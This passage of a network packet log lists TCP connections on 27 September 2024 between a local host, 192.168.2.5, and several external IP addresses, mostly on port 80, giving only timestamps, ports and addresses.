                                                                          Sep 27, 2024 04:21:16.744199991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744216919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744231939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744241953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744249105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744250059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744261980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744272947 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744273901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744286060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744291067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744302034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744313955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744322062 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744337082 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744363070 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744424105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744435072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744446039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744451046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744461060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744469881 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744472027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744478941 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744482040 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744488955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744502068 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744528055 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744744062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744756937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744769096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744779110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744782925 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744791031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744796991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744812012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744812965 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744826078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744836092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744848013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.744848967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744865894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744875908 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.744885921 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.759227037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759243011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759255886 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759265900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759282112 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759310007 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759356022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759367943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759377956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759401083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759411097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759438992 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759479046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759519100 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759655952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759670019 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759680033 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759685040 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.759697914 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.759727955 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760327101 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760341883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760369062 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760385036 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760793924 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760806084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760818005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760828972 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760833025 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760839939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760847092 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760854006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760864019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760869026 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760916948 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760934114 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760945082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760957003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.760979891 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.760991096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761099100 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761111975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761121035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761127949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761137009 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761137962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761167049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761193037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761286020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761297941 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761312962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761323929 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761328936 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761346102 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761363983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761416912 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761428118 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761457920 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761468887 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761591911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761603117 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761620998 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761630058 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761631966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761643887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761643887 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761656046 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761658907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761673927 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761689901 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761761904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761773109 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761785030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761794090 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761799097 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761822939 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761843920 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761939049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761950970 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761960983 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761966944 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761976004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761976004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.761987925 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.761997938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762000084 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762029886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762044907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762196064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762204885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762212038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762217999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762223005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762238979 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762265921 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762289047 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762329102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762341976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762370110 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762382984 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762614012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762625933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762638092 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:16.762650967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762671947 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762787104 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762804985 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762814999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762820005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762825966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.762830019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762859106 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.762887001 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.763715982 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763726950 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763732910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763777971 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.763878107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763891935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763902903 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763921022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763925076 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.763932943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.763937950 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.763967037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.765247107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765258074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765268087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765274048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765279055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765285015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765290022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765295982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.765319109 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.765328884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.765374899 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.765414953 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766639948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766650915 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766669989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766681910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766794920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766807079 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766817093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766824961 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766828060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766839981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766839981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766860962 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766875982 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.766967058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.766997099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.767600060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767608881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767618895 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767625093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767635107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767642021 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767647028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767658949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767658949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767690897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767828941 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767887115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767898083 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767909050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767918110 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767923117 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767930984 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767937899 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767941952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767951965 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767956018 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.767978907 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.767997026 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.768022060 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.768034935 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.768043041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.768059969 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.768075943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.768084049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.780172110 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:16.785195112 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794498920 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794511080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794523001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794550896 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794579983 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794640064 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794651031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794661999 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794672966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794678926 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794692993 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794708967 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794765949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794776917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794805050 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794828892 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794944048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794955969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794966936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794979095 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.794981003 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.794996977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.795017004 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.795137882 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.795150995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.795183897 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.795202017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.800920010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.800932884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.800942898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.800947905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.800955057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.800970078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.800990105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.801019907 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.801043987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.801054955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.801085949 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.801096916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802450895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802459002 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802468061 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802478075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802484989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802489042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802503109 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802536964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802614927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802627087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802649021 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802676916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.802953005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.802994013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.807327986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807337999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807347059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807353973 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807363987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807373047 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.807399035 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.807420015 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.807470083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807482958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807492018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.807507038 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.807533026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808092117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808104038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808115959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808139086 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808151007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808271885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808284044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808295965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808305979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808315039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808320045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808331966 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808347940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808437109 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808469057 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.808818102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808830023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808840036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808851004 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808866024 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.808891058 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.808912992 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.808947086 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808958054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808969021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808979988 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.808983088 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.809006929 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.809026003 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.809146881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809202909 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.809214115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.809225082 CEST8049725185.215.113.117192.168.2.5
